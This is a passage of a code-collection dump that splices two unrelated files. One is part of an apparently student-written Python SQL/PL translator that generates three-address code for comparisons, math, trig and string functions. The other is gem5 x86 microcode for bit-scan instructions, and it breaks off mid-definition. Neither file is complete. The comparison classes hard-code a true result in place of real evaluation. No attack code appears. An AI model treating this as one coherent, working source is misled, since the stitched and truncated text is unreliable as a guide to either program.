def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} == {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 == res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'==')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_mayor_igualp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} >= {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 >= res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'>=')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_menor_igualp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} <= {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 <= res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'<=')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_diferentep(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} != {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 != res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'!=')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class inst_procedural(expresion):
def __init__(self,val):
self.val = val
self.lista = []
def c3d(self):
return ''
def traducir(self):
return f'\tsql.execute(\'\'\'{self.val}\'\'\')\n'
def ejecutar(self):
pass
class pl_mathtrig(pl):
'Abstract Class'
class math_absp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
try:
resultado = abs(tr1[2])
except Exception:
resultado = 0
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=abs('+tr1[1]+')\n'
return codigo,tmp,resultado
class math_cbrtp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.cbrt(tr1[2])
codigo = tr1[0] +'\n'
tmp = getTemp()
codigo += tmp +'=mt.cbrt('+tr1[1]+')\n'
return codigo,tmp,resultado
class math_ceilp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = round(float(tr1[2]))
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=round(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_degreesp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.degrees(float(tr1[2]))
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.degrees(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_divp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.div(float(tr1[2]),float(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.div(float('+tr1[1]+'),float('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_expp(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.exp(int(tr1[2]))
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=mt.exp(int('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_factorialp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.factorial(int(tr1[2]))
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=mt.factorial(int('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_floorp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.floor(float(tr1[2]))
codigo = tr1[0] +'\n'
tmp = getTemp()
codigo += tmp +'=mt.floor(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_gcdp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.gcd(int(tr1[2]),int(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.gcd(int('+tr1[1]+'),int('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_lcmp(pl_mathtrig):
def __init__(self,exp1,exp2,alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.lcm(int(tr1[2]),int(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.lcm(int('+tr1[1]+'),int('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_lnp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.ln(float(tr1[2]))
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.ln(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_logp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.log(int(tr1[2]),int(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.log(int('+tr1[1]+'),int('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_log10p(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.log10(float(tr1[2]))
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.log10(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_min_scalep(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.min_scale(int(tr1[2]))
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.min_scale(int('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_scalep(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.scale(str(tr1[2]))
tmp = getTemp()
codigo += tmp +'=mt.scale(str('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_modp(pl_mathtrig):
def __init__(self, exp1,exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
resultado = mt.mod(float(tr1[2]),float(tr2[2]))
tmp = getTemp()
codigo += tmp +'=mt.mod(float('+tr1[1]+'),float('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_pip(pl_mathtrig):
def __init__(self, alias):
self.val = mt.pi()
self.alias = alias
def traducir(self):
codigo ='\n'
tmp = getTemp()
codigo += tmp +'= mt.pi()\n'
resultado = mt.pi()
return codigo,tmp,resultado
class math_powerp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.power(int('+tr1[1]+'),int('+tr2[1]+'))\n'
resultado = mt.power(int(tr1[2]),int(tr2[2]))
return codigo,tmp,resultado
class math_radiansp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.radians(float(tr1[2]))
tmp = getTemp()
codigo += tmp +'=mt.radians(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_roundp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=round(float('+tr1[1]+'))\n'
resultado = round(float(tr1[2]))
return codigo,tmp,resultado
class math_signp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.sign(float('+tr1[1]+'))\n'
resultado = mt.sign(float(tr1[2]))
return codigo,tmp, resultado
class math_sqrtp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.sqrt(float('+tr1[1]+'))\n'
resultado = mt.sqrt(float(tr1[2]))
return codigo,tmp,resultado
class math_trim_scalep(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.trim_scale(int('+tr1[1]+'))\n'
resultado = mt.trim_scale(int(tr1[2]))
return codigo,tmp,resultado
class math_widthBucketp(pl_mathtrig):
def __init__(self, exp1, exp2, exp3, exp4, alias):
self.exp1 = exp1
self.exp2 = exp2
self.exp3 = exp3
self.exp4 = exp4
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
tr3 = self.exp3.traducir()
tr4 = self.exp4.traducir()
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
codigo += tr3[0] + '\n'
codigo += tr4[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.width_bucket('+tr1[1]+','+tr2[1]+','+tr3[1]+','+tr4[1]+')\n'
resultado = mt.width_bucket(tr1[2],tr2[2],tr3[2],tr4[2])
return codigo,tmp,resultado
class math_truncp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.trunc(float(tr1[2]))
tmp = getTemp()
codigo += tmp +'=mt.trunc(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_randomp(pl_mathtrig):
def __init__(self, alias):
self.alias = alias
def traducir(self):
codigo = '\n'
tmp = getTemp()
codigo += tmp +'= mt.random()\n'
resultado = mt.random()
return codigo,tmp,resultado
class math_setseedp(pl_mathtrig):
def __init__(self,exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.setseed(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.setseed('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_acosp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.acos(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.acos('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_acosdp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.acosd(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.acosd('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_asinp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.asin(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.asin('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_asindp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.asind(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.asind('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atanp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atan(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.atan('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atandp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atand(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.atand('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atan2p(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
resultado = mt.atan2(tr1[2],tr2[2])
tmp = getTemp()
codigo += tmp +'= mt.atan2('+tr1[1]+','+tr2[1]+')\n'
return codigo,tmp,resultado
class trig_atan2dp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
resultado = mt.atan2d(tr1[2],tr2[2])
tmp = getTemp()
codigo += tmp + '= mt.atan2d('+tr1[1]+','+tr2[1]+')\n'
return codigo,tmp,resultado
class trig_cosp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cos(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.cos('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_cosdp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cosd(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.cosd('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_cotp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
resultado = mt.cot(tr1[2])
codigo += tmp+ ' = mt.cot('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_cotdp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cotd(tr1[2])
tmp = getTemp()
codigo +=tmp + ' = mt.cotd('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_sinp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.sin(tr1[2])
tmp = getTemp()
codigo += tmp + ' = mt.sin('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_sindp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.sind(tr1[2])
tmp = getTemp()
codigo +=tmp +' = mt.sind('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_tanp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.tan(tr1[2])
tmp = getTemp()
codigo +=tmp +' = mt.tan('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_tandp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.tand(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.tand('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_sinhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.sinh(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.sinh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_coshp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.cosh(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.cosh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_tanhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.tanh(tr1[2])
tmp = getTemp()
codigo +=tmp+ ' = mt.tanh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_asinhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.asinh(tr1[2])
tmp = getTemp()
codigo += tmp + ' = mt.asinh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_acoshp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.acosh(tr1[2])
tmp = getTemp()
codigo += tmp +' = mt.acosh('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_atanhp(pl_mathtrig):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.atanh(tr1[2])
tmp = getTemp()
codigo +=tmp +' = mt.atanh('+tr1[1]+')\n'
return codigo,tmp,resultado
class pl_function():
''' abstract class '''
class fun_lengthp(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = len(str(tr1[2]))
tmp = getTemp()
codigo += tmp +' = len(str('+tr1[1]+'))\n'
return codigo,tmp,resultado
class fun_trimp(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = str(tr1[2]).strip()
tmp = getTemp()
codigo += tmp +' = str('+tr1[1]+').strip()\n'
return codigo,tmp,resultado
class fun_md5p(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
crypt = hashlib.md5()
crypt.update(tr1[2].encode('utf-8'))
resultado = crypt.hexdigest()
codigo += 'crypt = hashlib.md5()\n'
codigo += 'crypt.update('+tr1[1]+'.encode(\'utf-8\'))\n'
tmp = getTemp()
codigo +=tmp +' = crypt.hexdigest()\n'
return codigo,tmp,resultado
class fun_sha256p(pl_function):
def __init__ (self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
crypt = hashlib.sha256()
crypt.update(tr1[2].encode('utf-8'))
resultado = crypt.hexdigest()
codigo += 'crypt = hashlib.sha256()\n'
codigo += 'crypt.update('+tr1[1]+'.encode(\'utf-8\'))\n'
tmp = getTemp()
codigo += tmp +' = crypt.hexdigest()\n'
return codigo,tmp,resultado
class fun_convertp(pl_function):
def __init__ (self,exp,tipo,alias):
self.exp = exp
self.type = tipo
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = tr1[2]
valor = tr1[1]
return codigo,valor,resultado
def ejecutar(self,tables):
return self.exp
class fun_substrp(pl_function):
def __init__ (self,exp,min,max,alias):
self.exp = exp
self.min = min
self.max = max
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = str(tr1[2])[self.min:self.max]
tmp = getTemp()
codigo += tmp +' = '+tr1[1]+'['+str(self.min)+':'+str(self.max)+']\n'
return codigo,tmp,resultado
class fun_nowp(pl_function):
def __init__ (self,alias):
self.alias = alias
def traducir(self):
codigo ='\n'
today = date.today()
resultado = today.strftime("%Y-%m-%d %H:%M:%S")
codigo += 'today = date.today()\n'
valor = 'today.strftime("%Y-%m-%d %H:%M:%S")'
return codigo,valor,resultado
class queryf(instruccion):
def __init__(self,callfunc):
self.callfunc = callfunc
def traducir(self):
t = self.callfunc.traducir()
t0 = t[0].replace('\n','\n\t')
return f'\t{t0}print({t[1]})\n'
def ejecutar(self):
return 'Se creo el select'
6243a7ff7d77e0c3ef22071ae49e4b71e9235a2c | 9,454 | py | Python | src/arch/x86/isa/insts/general_purpose/compare_and_test/bit_scan.py | qianlong4526888/haha | 01baf923693873c11ae072ce4dde3d8f1d7b6239 | ["BSD-3-Clause"]
# Copyright (c) 2007-2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop BSR_R_R {
# Determine if the input was zero, and also move it to a temp reg.
mov t1, t1, t0, dataSize=8
and t1, regm, regm, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0x0
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 0x20
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 0x10
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 0x8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 0x4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 0x2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 0x1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSR_R_M {
mov t1, t1, t0, dataSize=8
ld t1, seg, sib, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0x0
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 0x20
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 0x10
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 0x8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 0x4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 0x2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 0x1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSR_R_P {
rdip t7
mov t1, t1, t0, dataSize=8
ld t1, seg, riprel, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0x0
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 0x20
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 0x10
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 0x8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 0x4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 0x2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 0x1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSF_R_R {
# Determine if the input was zero, and also move it to a temp reg.
mov t1, t1, t0, dataSize=8
and t1, regm, regm, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
movi reg, reg, 0
subi t2, t1, 1
xor t1, t2, t1
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 32
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 16
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 4
mov reg, reg, t4, flags=(nCEZF,)
